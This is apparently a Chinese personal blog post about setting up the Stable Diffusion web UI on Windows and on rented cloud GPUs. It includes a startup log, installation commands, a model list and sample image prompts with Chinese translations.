    face_yolov8n.pt: 100%|█████████████████████| 6.23M/6.23M [00:01<00:00, 4.71MB/s]
    [2024-11-22 10:09:41,860][DEBUG][filelock] - Attempting to release lock 140561342047728 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/70b640f8f60b1cf0dcc72f30caf3da9495eb2fb6509da48c53374ad6806e6a9c.lock
    [2024-11-22 10:09:41,860][DEBUG][filelock] - Lock 140561342047728 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/70b640f8f60b1cf0dcc72f30caf3da9495eb2fb6509da48c53374ad6806e6a9c.lock


    person_yolov8s-seg.pt: 44%|██████▌ | 10.5M/23.9M [00:01<00:01, 7.20MB/s]



    face_yolov8s.pt: 47%|█████████▊ | 10.5M/22.5M [00:01<00:02, 5.43MB/s]

    person_yolov8s-seg.pt: 88%|█████████████▏ | 21.0M/23.9M [00:02<00:00, 8.41MB/s]

    person_yolov8s-seg.pt: 100%|███████████████| 23.9M/23.9M [00:02<00:00, 8.63MB/s]
    [2024-11-22 10:09:43,256][DEBUG][filelock] - Attempting to release lock 140561340312128 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock
    [2024-11-22 10:09:43,256][DEBUG][filelock] - Lock 140561340312128 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock




    face_yolov8s.pt: 93%|███████████████████▌ | 21.0M/22.5M [00:02<00:00, 7.86MB/s]



    face_yolov8s.pt: 100%|█████████████████████| 22.5M/22.5M [00:02<00:00, 7.52MB/s]
    [2024-11-22 10:09:43,628][DEBUG][filelock] - Attempting to release lock 140561340302624 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [2024-11-22 10:09:43,628][DEBUG][filelock] - Lock 140561340302624 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [-] ADetailer initialized. version: 24.9.0, num models: 10
    Using sqlite file: /root/stable-diffusion-webui/extensions/sd-webui-agent-scheduler/task_scheduler.sqlite3
    ControlNet preprocessor location: /root/autodl-tmp/models/controlnet_annotator
    2024-11-22 10:09:46,370 - ControlNet - INFO - ControlNet v1.1.455
    Please 'pip install apex'
    [sd-webui-freeu] Controlnet support: *enabled*
    sd-webui-prompt-all-in-one background API service started successfully.
    2024-11-22 10:09:47,532 - roop - INFO - roop v0.0.2
    2024-11-22 10:09:47,627 - roop - INFO - roop v0.0.2
    [2024-11-22 10:09:48,591][DEBUG][api.py] - API flag not enabled, skipping API layer. Please enable with --api
    == WD14 tagger /gpu:0, uname_result(system='Linux', node='autodl-container-2cce11be52-d05bc5cf', release='5.4.0-182-generic', version='#202-Ubuntu SMP Fri Apr 26 12:29:36 UTC 2024', machine='x86_64') ==
    Checkpoint Anything-ink.safetensors [a1535d0a42] not found; loading fallback Anything-ink.safetensors
    Calculating sha256 for /root/stable-diffusion-webui/models/Stable-diffusion/Anything-ink.safetensors: 2024-11-22 10:09:50,529 - ControlNet - INFO - ControlNet UI callback registered.
    LightDiffusionFlow 绑定完成
    *Deforum ControlNet support: enabled*
    [tag-editor] Custom taggers loaded: ['Improved Aesthetic Predictor', 'cafeai aesthetic classifier', 'aesthetic shadow', 'wd aesthetic classifier']
    Running on local URL: http://127.0.0.1:6006
    [2024-11-22 10:09:53,176][DEBUG][botocore.hooks] - Changing event name from creating-client-class.iot-data to creating-client-class.iot-data-plane
    [2024-11-22 10:09:53,178][DEBUG][botocore.hooks] - Changing event name from before-call.apigateway to before-call.api-gateway
    [2024-11-22 10:09:53,178][DEBUG][botocore.hooks] - Changing event name from request-created.machinelearning.Predict to request-created.machine-learning.Predict
    [2024-11-22 10:09:53,179][DEBUG][botocore.hooks] - Changing event name from before-parameter-build.autoscaling.CreateLaunchConfiguration to before-parameter-build.auto-scaling.CreateLaunchConfiguration
    [2024-11-22 10:09:53,180][DEBUG][botocore.hooks] - Changing event name from before-parameter-build.route53 to before-parameter-build.route-53
    [2024-11-22 10:09:53,180][DEBUG][botocore.hooks] - Changing event name from request-created.cloudsearchdomain.Search to request-created.cloudsearch-domain.Search
    [2024-11-22 10:09:53,181][DEBUG][botocore.hooks] - Changing event name from docs.*.autoscaling.CreateLaunchConfiguration.complete-section to docs.*.auto-scaling.CreateLaunchConfiguration.complete-section
    [2024-11-22 10:09:53,183][DEBUG][botocore.hooks] - Changing event name from before-parameter-build.logs.CreateExportTask to before-parameter-build.cloudwatch-logs.CreateExportTask
    [2024-11-22 10:09:53,183][DEBUG][botocore.hooks] - Changing event name from docs.*.logs.CreateExportTask.complete-section to docs.*.cloudwatch-logs.CreateExportTask.complete-section
    [2024-11-22 10:09:53,183][DEBUG][botocore.hooks] - Changing event name from before-parameter-build.cloudsearchdomain.Search to before-parameter-build.cloudsearch-domain.Search
    [2024-11-22 10:09:53,183][DEBUG][botocore.hooks] - Changing event name from docs.*.cloudsearchdomain.Search.complete-section to docs.*.cloudsearch-domain.Search.complete-section
    [2024-11-22 10:09:53,185][DEBUG][botocore.utils] - IMDS ENDPOINT: http://169.254.169.254/
    [2024-11-22 10:09:53,186][DEBUG][botocore.credentials] - Looking for credentials via: env
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: assume-role
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: assume-role-with-web-identity
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: sso
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: shared-credentials-file
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: custom-process
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: config-file
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: ec2-credentials-file
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: boto-config
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: container-role
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: iam-role
    [2024-11-22 10:09:54,190][DEBUG][botocore.utils] - Caught retryable HTTP exception while making metadata service request to http://169.254.169.254/latest/api/token: Connect timeout on endpoint URL: "http://169.254.169.254/latest/api/token"
    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 174, in _new_conn
    conn = connection.create_connection(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/connection.py", line 95, in create_connection
    raise err
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/connection.py", line 85, in create_connection
    sock.connect(sa)
    TimeoutError: timed out

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/httpsession.py", line 465, in send
    urllib_response = conn.urlopen(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 787, in urlopen
    retries = retries.increment(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/retry.py", line 525, in increment
    raise six.reraise(type(error), error, _stacktrace)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/packages/six.py", line 770, in reraise
    raise value
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 703, in urlopen
    httplib_response = self._make_request(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 398, in _make_request
    conn.request(method, url, **httplib_request_kw)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 239, in request
    super(HTTPConnection, self).request(method, url, body=body, headers=headers)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1282, in request
    self._send_request(method, url, body, headers, encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 94, in _send_request
    rval = super()._send_request(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1328, in _send_request
    self.endheaders(body, encode_chunked=encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1277, in endheaders
    self._send_output(message_body, encode_chunked=encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 123, in _send_output
    self.send(msg)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 218, in send
    return super().send(str)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 975, in send
    self.connect()
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 205, in connect
    conn = self._new_conn()
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 179, in _new_conn
    raise ConnectTimeoutError(
    urllib3.exceptions.ConnectTimeoutError: (<botocore.awsrequest.AWSHTTPConnection object at 0x7fd6b31d9a80>, 'Connection to 169.254.169.254 timed out. (connect timeout=1)')

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/utils.py", line 456, in _fetch_metadata_token
    response = self._session.send(request.prepare())
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/httpsession.py", line 500, in send
    raise ConnectTimeoutError(endpoint_url=request.url, error=e)
    botocore.exceptions.ConnectTimeoutError: Connect timeout on endpoint URL: "http://169.254.169.254/latest/api/token"
    [2024-11-22 10:09:55,193][DEBUG][botocore.utils] - Caught retryable HTTP exception while making metadata service request to http://169.254.169.254/latest/meta-data/iam/security-credentials/: Connect timeout on endpoint URL: "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 174, in _new_conn
    conn = connection.create_connection(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/connection.py", line 95, in create_connection
    raise err
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/connection.py", line 85, in create_connection
    sock.connect(sa)
    TimeoutError: timed out

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/httpsession.py", line 465, in send
    urllib_response = conn.urlopen(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 787, in urlopen
    retries = retries.increment(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/retry.py", line 525, in increment
    raise six.reraise(type(error), error, _stacktrace)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/packages/six.py", line 770, in reraise
    raise value
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 703, in urlopen
    httplib_response = self._make_request(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 398, in _make_request
    conn.request(method, url, **httplib_request_kw)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 239, in request
    super(HTTPConnection, self).request(method, url, body=body, headers=headers)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1282, in request
    self._send_request(method, url, body, headers, encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 94, in _send_request
    rval = super()._send_request(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1328, in _send_request
    self.endheaders(body, encode_chunked=encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1277, in endheaders
    self._send_output(message_body, encode_chunked=encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 123, in _send_output
    self.send(msg)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 218, in send
    return super().send(str)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 975, in send
    self.connect()
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 205, in connect
    conn = self._new_conn()
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 179, in _new_conn
    raise ConnectTimeoutError(
    urllib3.exceptions.ConnectTimeoutError: (<botocore.awsrequest.AWSHTTPConnection object at 0x7fd6b31d9f90>, 'Connection to 169.254.169.254 timed out. (connect timeout=1)')

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/utils.py", line 509, in _get_request
    response = self._session.send(request.prepare())
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/httpsession.py", line 500, in send
    raise ConnectTimeoutError(endpoint_url=request.url, error=e)
    botocore.exceptions.ConnectTimeoutError: Connect timeout on endpoint URL: "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    [2024-11-22 10:09:55,194][DEBUG][botocore.utils] - Max number of attempts exceeded (1) when attempting to retrieve data from metadata service.
    [2024-11-22 10:09:55,195][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/endpoints.json
    [2024-11-22 10:09:55,206][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/sdk-default-configuration.json
    [2024-11-22 10:09:55,206][DEBUG][botocore.hooks] - Event choose-service-name: calling handler <function handle_service_name_alias at 0x7fd7d6e0ea70>
    [2024-11-22 10:09:55,218][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/sts/2011-06-15/service-2.json
    [2024-11-22 10:09:55,231][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/sts/2011-06-15/endpoint-rule-set-1.json.gz
    [2024-11-22 10:09:55,231][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/partitions.json
    [2024-11-22 10:09:55,232][DEBUG][botocore.hooks] - Event creating-client-class.sts: calling handler <function add_generate_presigned_url at 0x7fd7e4155cf0>
    [2024-11-22 10:09:55,234][DEBUG][botocore.endpoint] - Setting sts timeout as (60, 60)
    [2024-11-22 10:09:55,235][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/_retry.json
    [2024-11-22 10:09:55,235][DEBUG][botocore.client] - Registering retry handlers for service: sts
    [2024-11-22 10:09:55,236][DEBUG][botocore.hooks] - Event before-parameter-build.sts.GetCallerIdentity: calling handler <function generate_idempotent_uuid at 0x7fd7d6e2c0d0>
    [2024-11-22 10:09:55,236][DEBUG][botocore.regions] - Calling endpoint provider with parameters: {'Region': 'aws-global', 'UseDualStack': False, 'UseFIPS': False, 'UseGlobalEndpoint': True}
    [2024-11-22 10:09:55,238][DEBUG][botocore.regions] - Endpoint provider result: https://sts.amazonaws.com
    [2024-11-22 10:09:55,238][DEBUG][botocore.regions] - Selecting from endpoint provider's list of auth schemes: "sigv4". User selected auth scheme is: "None"
    [2024-11-22 10:09:55,238][DEBUG][botocore.regions] - Selected auth type "v4" as "v4" with signing context params: {'region': 'us-east-1', 'signing_name': 'sts'}
    [2024-11-22 10:09:55,238][DEBUG][botocore.hooks] - Event before-call.sts.GetCallerIdentity: calling handler <function add_recursion_detection_header at 0x7fd7d6e0fd00>
    [2024-11-22 10:09:55,238][DEBUG][botocore.hooks] - Event before-call.sts.GetCallerIdentity: calling handler <function inject_api_version_header_if_needed at 0x7fd7d6e2d900>
    [2024-11-22 10:09:55,238][DEBUG][botocore.endpoint] - Making request for OperationModel(name=GetCallerIdentity) with params: {'url_path': '/', 'query_string': '', 'method': 'POST', 'headers': {'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8', 'User-Agent': 'Boto3/1.26.144 Python/3.10.6 Linux/5.4.0-182-generic Botocore/1.29.144'}, 'body': {'Action': 'GetCallerIdentity', 'Version': '2011-06-15'}, 'url': 'https://sts.amazonaws.com/', 'context': {'client_region': 'aws-global', 'client_config': <botocore.config.Config object at 0x7fd6b31d9960>, 'has_streaming_input': False, 'auth_type': 'v4', 'signing': {'region': 'us-east-1', 'signing_name': 'sts'}}}
    [2024-11-22 10:09:55,239][DEBUG][botocore.hooks] - Event request-created.sts.GetCallerIdentity: calling handler <bound method RequestSigner.handler of <botocore.signers.RequestSigner object at 0x7fd6b31d9ab0>>
    [2024-11-22 10:09:55,239][DEBUG][botocore.hooks] - Event choose-signer.sts.GetCallerIdentity: calling handler <function set_operation_specific_signer at 0x7fd7d6e0ff40>

    To create a public link, set `share=True` in `launch()`.
    ----------------- light_diffusion_flow api start------------------
    [2024-11-22 10:09:57,427][INFO][sd] - [AgentScheduler] Task queue is empty
    [2024-11-22 10:09:57,427][INFO][sd] - [AgentScheduler] Registering APIs
    Startup time: 30.2s (prepare environment: 1.8s, import torch: 6.2s, import gradio: 1.1s, setup paths: 0.5s, initialize shared: 0.2s, other imports: 0.5s, load scripts: 11.1s, create ui: 3.5s, gradio launch: 2.6s, app_started_callback: 2.6s).
    a1535d0a42ce4f8822ed034c15aeff62cc515836e388511d294645d11db8c10d
    Loading weights [a1535d0a42] from /root/stable-diffusion-webui/models/Stable-diffusion/Anything-ink.safetensors
    Creating model from config: /root/stable-diffusion-webui/configs/v1-inference.yaml
    Applying attention optimization: xformers... done.
    Model loaded in 13.2s (calculate hash: 11.6s, create model: 0.5s, apply weights to model: 0.8s, calculate empty prompt: 0.1s).
    refresh_ui
    [2024-11-22 10:12:54,488][DEBUG][git.cmd] - Popen(['git', 'remote', 'get-url', '--all', 'origin'], cwd=/root/stable-diffusion-webui, stdin=None, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,492][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch-check'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,495][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,500][DEBUG][git.cmd] - Popen(['git', 'remote', 'get-url', '--all', 'origin'], cwd=/root/stable-diffusion-webui, stdin=None, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,502][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch-check'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,504][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:14:08,139][INFO][modules.shared_state] - Starting job task(5iw18yq6o0rkn76)
    Warning: field infotext in API payload not found in <modules.processing.StableDiffusionProcessingTxt2Img object at 0x7fd72428a710>.
    0%| | 0/20 [00:00<?, ?it/s]
    5%|██▏ | 1/20 [00:00<00:08, 2.31it/s]
    25%|███████████ | 5/20 [00:00<00:01, 8.25it/s]
    35%|███████████████▍ | 7/20 [00:00<00:01, 9.97it/s]
    45%|███████████████████▊ | 9/20 [00:01<00:00, 11.13it/s]
    55%|███████████████████████▋ | 11/20 [00:01<00:00, 11.91it/s]
    65%|███████████████████████████▉ | 13/20 [00:01<00:00, 11.51it/s]
    75%|████████████████████████████████▎ | 15/20 [00:01<00:00, 12.95it/s]
    85%|████████████████████████████████████▌ | 17/20 [00:01<00:00, 13.15it/s]
    95%|████████████████████████████████████████▊ | 19/20 [00:01<00:00, 13.33it/s]
    100%|███████████████████████████████████████████| 20/20 [00:01<00:00, 10.93it/s]

    Total progress: 100%|███████████████████████████| 20/20 [00:01<00:00, 11.42it/s]
    [2024-11-22 10:14:10,403][INFO][modules.shared_state] - Ending job task(5iw18yq6o0rkn76) (2.26 seconds)

    内置模型

    主流模型(大模型)

    • [Yuno779] Anything-ink(二次元)

    • [rqdwdw] Counterfeit-V3.0(二次元)

    • [newlifezfztty761] CuteYukiMix-specialchapter(二次元/特化可爱风格)

    • [stabilityai] SD_XL(通用)

    • [xiaolxl] GuoFeng4.1_2.5D_XL(2.5D/通用)

    • [GhostInShell] GhostMix-V2.0(2.5D)

    • [s6yx] rev_1.2.2(2.5D)

    • [Aitasai] darkSushiMixMix 大颗寿司 Mix(2.5D/二次元)

    推荐模型(大模型)

    • [CagliostroLab] Animagine-XL-V3(二次元)

    • [playgroundai] playground-v2-XL(13GB)(通用)

    • [Yuno779] Anything-V3.0(二次元)

    • [未知] momoko-e(二次元)

    • [swl-models] PVCGK(手办风格)

    • [xiaolxl] WestMagic(西幻/2.5D)

    经典模型(大模型)

    • [stabilityai] stable-diffusion-v1-5(通用)

    国风系列(大模型)

    • [xiaolxl] GuoFeng4.2XL(国风/通用)

    • [xiaolxl] GuoFeng4.0_Real_Beta(国风/通用)

    • [xiaolxl] GuoFeng3.4(2.5D/国风)

    • [xiaolxl] GuoFeng3.3(2.5D/国风)

    • [xiaolxl] GuoFeng3.2_light(2.5D/暗光特化/国风)

    • [xiaolxl] GuoFeng3.2(2.5D/国风)

    • [xiaolxl] GuoFeng3.1(2.5D/国风)

    • [xiaolxl] GuoFeng2_MIX(2.5D/国风)

    • [xiaolxl] GuFengXL(二次元/古风/通用)

    • [xiaolxl] GuFeng2(二次元/古风)

    • [xiaolxl] GuFeng1(二次元/古风)

    常用Lora(Lora模型)

    • [xiaolxl] GuFengXL_Lora(古风)

    • [liaoliaojun-了了君] hanfuTang_v41_SDXL(汉服唐风)

    • [simhuang] MoXinV1(墨风)

    • [AlchemistW] 小人书2.0(小人书风格)

    • [liaoliaojun-了了君] 汉服3.0(汉服)

    • [CyberAIchemist] add_detail细节调整(细节调整)

    • [samecorner] blindbox_v1_mix(盲盒/手办/可爱)

    • [xiaolxl] Dream(梦幻)

    • [xiaolxl] WuMo2(武墨风)

    插件所需依赖/模型

    • Controlnet 预处理器(17GB+)

    • Controlnet_v1_1_SD1.5 模型_fp16(11GB+)

    • Controlnet_XL 模型_fp16(25GB+)

    • Controlnet 新增模型合集(20GB+)

    • Controlnet 新增 Lora 合集(1GB±)

    • AnimateDiff 动画模型(2GB+)

    • 常用 VAE 模型

    • AnimateDifV2 的 motionLoRA 和 v3AdapterLora(350MB)

    • AnimateDifV3 的 SparseControlNet 模型(2GB)

    • TAG 插件反推依赖模型包(3GB±)

    • Controlnet_v1_1_SD1.5 模型_fp16(11GB+)

    • Controlnet_XL 模型_fp16(25GB+)

    • Controlnet 新增模型合集(20GB+)

    • Controlnet 新增 Lora 合集(1GB±)

    • AnimateDiff 动画模型(2GB+)

    • 常用 VAE 模型

    • AnimateDifV2 的 motionLoRA 和 v3AdapterLora(350MB)

    • AnimateDifV3 的 SparseControlNet 模型(2GB)

    • TAG 插件反推依赖模型包(3GB±)

    模型网站

    ]]>
    + 组件
    • Git

    • Python

    • AUTOMATIC1111

    • Stable Diffusion 模型

      • 基础模型

        • Stable Diffusion 2 最重要的转变是替换文本编码器。Stable Diffusion 1 使用 OpenAl 的 CLIP,这是一种开源模型,可以了解标题对图像的描述程度。虽然模型本身是开源的,但重要的是,训练 CLIP 的数据集不是公开可用的。
          它使用已知 Stable Diffusion 2 改为使用 OpenCLIP 它是 CLIP 的开源版本数据集进行训练- LAION-5B 的美学子集,可过滤掉 NSFW 图像。Stability Al 表示 OpenCLIP “极大地提高了生成图像的质量”,事实上,在指标上优于 CLIP 的未发布版本。(有时候 2 的效果不如 1 是正常的)
        • huggingface
      • 预训练的模型(在基础模型的基础上做了与预先的微调,可以生成特定风格的人物)

    png

    模型有 ckptsafetensors

    • ckpt 比较早期,嵌入了 python 的一些脚本,容易受到病毒攻击

    • safetensors 较新,且读取速度更快

    安装

    克隆仓库

    AUTOMATIC1111/stable-diffusion-webui: Stable Diffusion web UI (github.com)

    1
    git clone https://github.com/AUTOMATIC1111/stable-diffusion-webui

    下载模型

    以 1.5 为例:runwayml/stable-diffusion-v1-5 at main (huggingface.co)

    png

    将下载好的模型放入仓库的 models/Stable-diffusion 中:

    png

    安装 conda

    1
    conda create -n stable-diffusion python=3.10
    1
    conda activate stable-diffusion
    1
    where python
    1
    2
    3
    C:\Users\19048\.conda\envs\stable-diffusion\python.exe
    C:\ProgramData\anaconda3\python.exe
    C:\Users\19048\AppData\Local\Microsoft\WindowsApps\python.exe

    设置仓库根目录下,webui-user.bat 里的参数:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    # git pull
    @echo off

    set PYTHON="C:\Users\19048\.conda\envs\stable-diffusion\python.exe"
    set GIT=
    set VENV_DIR=
    set COMMANDLINE_ARGS=

    call webui.bat
    • git pull 让项目每次运行前都拉取最新的仓库,我就不设了
    • set PYTHON="C:\Users\19048\.conda\envs\stable-diffusion\python.exe" 设置 python 解释器的位置

    运行 webui

    1
    webui-user.bat
    1
    2
    3
    4
    5
    6
    7
    8
    venv "D:\Study\1st-year-master\Code\StableDiffusion\stable-diffusion-webui\venv\Scripts\Python.exe"
    Python 3.10.9 | packaged by Anaconda, Inc. | (main, Mar 1 2023, 18:18:15) [MSC v.1916 64 bit (AMD64)]
    Commit hash: 22bcc7be428c94e9408f589966c2040187245d81
    Installing torch and torchvision
    Looking in indexes: https://pypi.org/simple, https://download.pytorch.org/whl/cu117
    Collecting torch==1.13.1+cu117
    Downloading https://download.pytorch.org/whl/cu117/torch-1.13.1%2Bcu117-cp310-cp310-win_amd64.whl (2255.4 MB)
    ━╸━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 0.1/2.3 GB 2.2 MB/s eta 0:16:38

    我试图绕开这个安装 torch 的环节,因为我觉得它安装有点慢,但是我不会😅……但是把代理关了好像还蛮快的?冀大的网速还是值得一夸。

    老是下载一半报错:

    pip._vendor.urllib3.excerptions.ReadTimeoutError: HTTPSConnectionPool(host=‘download.pytorch.org’, port=443): Read timed out.

    唉,因为用清华镜像会下成 CPU 版本的 pytorch,只能一直试了,真傻逼啊。

    结果安装到gfpgan还是失败……先吃午饭吧。


    我说婷婷!直接上网找个整合版安装包吧😅。

    打开网页报错 Something went wrong Expecting value: line 1 column 1 (char 0)的,把你梯子关了

    尝试使用xFormers会报错,好吧那就关了。

    png

    一些使用教程:

    太变态的就不发了咳咳咳……

    • cubistic painting of Samuel Beckett by Picasso and Georges Braque, analytical cubism, brushstrokes
      • 毕加索和乔治·布拉克分析立体主义笔触的塞缪尔·贝克特立体主义绘画

    ![png](cubistic painting of Samuel Beckett by Picasso and Georges Braque, analytical cubism, brushstrokes.png)

    • photo of rihanna. latex. artgerm, ilya kuvshinov, alphonse mucha. highly detailed 8 k. intricate. nikon d 8 5 0 5 5 mm. award wi
      • 蕾哈娜的照片。乳胶。Artgerm, Ilya Kuvshinov, Alphonse Mucha.高度详细的 8 K. 错综复杂。尼康 D 8 5 0 5 5 毫米奖 WI

    ![png](photo of rihanna. latex. artgerm, ilya kuvshinov, alphonse mucha. highly detailed 8 k. intricate. nikon d 8 5 0 5 5 mm. award wi.png)

    • junji ito style homer simpson, intricate, highly detailed, illustration, art by junji ito, junji ito
      • 伊藤淳二风格荷马辛普森,复杂,高度详细,插图,伊藤淳二,伊藤润二的艺术

    ![png](junji ito style homer simpson, intricate, highly detailed, illustration, art by junji ito, junji ito.png)

    • Audrey Hepburn painting by Van Gogh
      • 梵高画的奥黛丽赫本

    ![png](Audrey Hepburn painting by Van Gogh.png)

    • realistic extremely detailed portrait painting of a beautiful black woman with a robot, city street on background by Jean Delvil
      • 现实的极其详细的肖像画,一个美丽的黑人妇女与机器人,背景上的城市街道,由 Jean Delvil 绘制

    ![png](realistic extremely detailed portrait painting of a beautiful black woman with a robot, city street on background by Jean Delvil.png)

    • Michael Jackson painting by Pegaso
      • 毕加索画的迈克尔杰克逊

    ![png](Michael Jackson painting by Pegaso.png)

    • a really suspicious horse, you can just tell that it’s up to no good
      • 一匹非常可疑的马,你可以说它没有好处

    ![png](a really suspicious horse, you can just tell that it’s up to no good.png)

    线上部署

    Colab

    • 本地吃配置
    • 本地部署复杂
    • 随时随地访问
    • 免费

    ​Colab 部署地址:camenduru/stable-diffusion-webui-colab at drive (github.com)

    AutoDL

    webp

    ​租一个 2080。

    webp

    ​这里选择 v15.9

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
